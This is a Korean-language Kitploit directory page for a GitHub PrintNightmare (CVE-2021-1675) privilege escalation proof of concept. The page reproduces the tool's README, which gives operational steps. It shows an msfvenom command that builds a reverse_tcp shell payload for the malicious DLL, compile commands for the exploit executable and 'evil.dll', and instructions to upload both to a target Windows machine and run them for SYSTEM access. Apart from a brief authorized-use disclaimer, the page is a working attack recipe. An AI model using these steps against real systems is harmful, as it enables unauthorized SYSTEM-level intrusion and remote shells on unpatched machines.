Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-1675 — 로컬 권한 상승 익스플로잇으로, CVE-2021-1675(PrintNightmare)를 악용하여 취약한 Windows 시스템에서 악성 DLL을 설치하고 SYSTEM 액세스 권한을 획득합니다. | Kitploit
도구/GitHubGitHub/andrewtrube/cve-2021-1675
Privilege EscalationExploit FrameworksExploitationPenetration TestingRed TeamingPayload Development
GitHubandrewtrube/cve-2021-1675

CVE-2021-1675

로컬 권한 상승 익스플로잇으로, CVE-2021-1675(PrintNightmare)를 악용하여 취약한 Windows 시스템에서 악성 DLL을 설치하고 SYSTEM 액세스 권한을 획득합니다.

저장소 보기
514년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

PrintNightmare 로컬 권한 상승 PoC

src/nightmare.cpp: CVE-2021-1675를 악용하여 시스템 액세스 권한을 얻는 소스 코드 악성 dll을 설치하여 src/payload-dll.cpp: 엔트리 함수에 악성 셸코드가 포함된 dll용 소스 코드

!!테스트 권한이 있는 서버에만 사용하세요

요약

CVE-2021-1675는 Microsoft Windows의 Print Spooler 서비스에서 발견된 취약점으로, 공격자가 SeLoadDriverPrivilege 검사를 우회할 수 있게 합니다. 이 취약점은 셸코드를 호출하거나 Windows API를 사용하여 리버스 셸 연결을 설정하는 악성 DLL을 설치함으로써 대상 머신에서 권한 상승을 달성하는 데 활용될 수 있습니다. 2021년 6월 8일 이전의 Windows 10/8/Server 2008/Server 2012 버전이 영향을 받습니다.

POC

  1. git 저장소를 다운로드하거나 클론합니다
  2. msfvenom을 사용하여 c 언어로 적절한 페이로드를 생성합니다 $ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f c
  3. msfvenom의 출력 결과를 payload-dll.cpp에서 'change me'라고 표시된 부분에 붙여넣습니다
  4. 메인 실행 파일을 컴파일합니다 x86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspool
  5. dll을 컴파일합니다 x86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -shared
  6. exe와 dll을 압축한 다음, 압축 파일을 대상 머신에 업로드할 방법을 찾습니다 zip ./bin/PrinterNightmareLPE.exe ./lib/
  7. 압축 파일이 대상 Windows 머신에 도착하면 압축을 해제합니다
  8. evil.dll을 c:\windows\temp\evil.dll로 이동합니다
  9. PrintNightmareLPE.exe를 실행합니다

참고 사항

  • 모든 것이 정상적으로 작동한다면 익스플로잇은 Windows 프린터 드라이버를 반복적으로 탐색하며 결과를 출력합니다
  • PrintNightmareLPE.exe가 evil.dll을 로드하는 파일 경로는 소스 코드 내에서 변경할 수 있습니다
  • 현재 악성 dll은 개념 증명(PoC)으로 calc.exe만 로드합니다
도구 다운로드